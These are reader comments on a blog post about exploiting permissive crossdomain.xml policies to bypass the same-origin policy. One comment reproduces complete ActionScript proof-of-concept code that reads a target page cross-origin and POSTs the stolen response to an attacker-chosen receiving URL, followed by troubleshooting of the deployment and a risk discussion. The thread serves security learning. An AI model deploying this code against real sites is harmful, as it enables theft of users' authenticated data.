Comments on Random Security: Exploiting Insecure crossdomain.xml to Bypass Same Origin Policy (ActionScript PoC)
Blog author: Gursev Singh Kalra (http://www.blogger.com/profile/11125392470187170013)
Adam Davies (https://abeontech.com/), 2015-11-12 07:23 -08:00:
Great write-up. It's all too easy to miss stuff like this when developing a site, but the recent Ashley Madison hack shows how easily this can be leveraged to exfiltrate data!

anonymous, 2015-06-07 11:31 -07:00:
This comment has been removed by the author.

Gursev Singh Kalra, 2014-06-16 10:02 -07:00:
Great. Good to know that.

bugasur, 2014-06-16 05:21 -07:00:
Thanks Gursev. It worked.

bugasur, 2014-06-12 13:07 -07:00:
This comment has been removed by the author.

Gursev Singh Kalra, 2013-12-16 06:24 -08:00:
You will agree that the risk is aggravated if the accessed page is available only to authenticated users. However, pre-auth pages can be accessed directly by anyone, so no information disclosure risk there.

Anonymous, 2013-12-16 06:04 -08:00:
I think I may have answered my own question. When I load the victim URL and the malicious HTML file, I do get a

    304 HTTPS www.targetURL.org /crossdomain.xml

    GET /crossdomain.xml

in Fiddler, with cookies, specifically a sfsession= (....) cookie, which is in line with your description of how this Flash file works. However, this URL is an unauthenticated page, so I do believe this vuln is not necessarily high risk. Your thoughts?
Thank you for your time.

Anonymous, 2013-12-16 05:23 -08:00:

    // Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)
    // XDomainXploit.as
    // Thanks - http://help.adobe.com/en_US/as3/dev/WS5b3ccc516d4fbf351e63e3d118a9b90204-7cfd.html#WS5b3ccc516d4fbf351e63e3d118a9b90204-7cf5
    package {
        import flash.display.Sprite;
        import flash.events.*;
        import flash.net.URLRequestMethod;
        import flash.net.URLRequest;
        import flash.net.URLLoader;

        public class XDomainXploit extends Sprite {
            public function XDomainXploit() {
                // Target URL from where the data is to be retrieved.
                // The cross-origin read only succeeds if the target's
                // crossdomain.xml permits the domain hosting this SWF.
                var readFrom:String = "TEST URL";
                var readRequest:URLRequest = new URLRequest(readFrom);
                var getLoader:URLLoader = new URLLoader();
                getLoader.addEventListener(Event.COMPLETE, eventHandler);
                try {
                    getLoader.load(readRequest);
                } catch (error:Error) {
                    trace("Error loading URL: " + error);
                }
            }

            // Runs once the target response has been fully read
            private function eventHandler(event:Event):void {
                // URL to which retrieved data is to be sent
                var sendTo:String = "RECEIVING URL";
                var sendRequest:URLRequest = new URLRequest(sendTo);
                sendRequest.method = URLRequestMethod.POST;
                sendRequest.data = event.target.data;
                var sendLoader:URLLoader = new URLLoader();
                try {
                    sendLoader.load(sendRequest);
                } catch (error:Error) {
                    trace("Error loading URL: " + error);
                }
            }
        }
    }

This is the XDomainXploit.as file I use. I then compile it with mxmlc in the cmd prompt and get a .swf file. I copied and pasted the HTML file into Notepad and saved it as .html. I load both the victim URL and the HTML file in Internet Explorer, and in Fiddler, or any proxy, I see no data similar to your screenshot.

Gursev Singh Kalra, 2013-12-13 12:59 -08:00:
@Anonymous if you can share your test configuration, maybe I can try to help.

Gursev Singh Kalra, 2013-12-13 12:57 -08:00:
I don't think the URL should be an issue, as long as it can be parsed.

Anonymous, 2013-12-13 11:50 -08:00:
I am kind of lost after deploying the file. I launch the HTML file, which references the .swf file, which has my target URL. Does it matter which URL I put in the "sendTo:String =" quotes?
I assume that once I have the target URL and the malicious HTML both loaded, I will see the data within what looks like Fiddler in your example? However, I am seeing no data. Any advice would be appreciated! Thanks!

Gursev Singh Kalra, 2013-09-16 09:34 -07:00:
Cool! Glad it was helpful.

Gursev

Malik Mesellem (http://www.itsecgames.com), 2013-09-12 13:52 -07:00:
Very nice article.

The attack, also the ActionScript code, is integrated in bWAPP (a buggy web application).

More info: www.itsecgames.com

Thanks Gursev!

Regards